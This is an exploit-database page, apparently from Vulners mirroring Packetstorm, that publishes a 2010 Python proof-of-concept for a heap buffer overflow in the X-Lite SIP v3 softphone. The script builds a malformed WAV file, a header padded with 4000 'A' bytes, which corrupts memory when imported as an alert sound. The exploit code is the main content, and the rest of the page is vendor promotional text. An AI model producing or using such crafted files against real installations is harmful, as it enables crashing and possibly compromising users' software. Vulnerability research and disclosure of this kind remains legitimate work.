Lucene search
K

X-Lite SIP 3 Memory Corruption

🗓️ 08 Feb 2010 00:00:00Reported by TecR0cType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 13 Views

X-Lite SIP 3 Memory Corruption exploi

Code
`#!/usr/bin/python  
#   
# ####################################################################  
#  
# X-lite SIP v3 (wav) memory corruption Heap BOF exploit  
# Date: 06-02-2010  
# Author: TecR0c  
# Software Link: http://xlite.counterpath.com/download/win32_beta_100120  
# Version: 3.0  
# Tested on: Windows XP SP3  
# Usage: right click running application > options > Alerts & sounds > import --> boom!  
#  
######################################################################  
  
header = ("\x52\x49\x46\x46\xe4\x0a\x09\x00\x57\x41\x56\x45\x66\x6d\x74\x20"  
"\x10\x00\x00\x00\x01\x00\x02\x00\x44\xac\x00\x00\x10\xb1\x02\x00"  
"\x04\x00\x10\x00\x64\x61\x74\x61\xc0\x0a\x09\x00\x01\x00\x01\x00"  
"\x00\x00\x01\x00\x01\x00\x04\x00\x00\x00\x05\x00\x02\x00\x08\x00"  
"\x02\x00\x09\x00\x01\x00\x0a")  
  
exploit = header  
exploit += "\x41" * 4000  
  
try:  
print "[+] Creating exploit file.."  
crash = open('TecR0c-wins.wav','w');  
crash.write(exploit);  
crash.close();  
except:  
print "[-] Error: You do not have correct permissions.."  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Feb 2010 00:00Current
0.2Low risk
Vulners AI Score0.2
13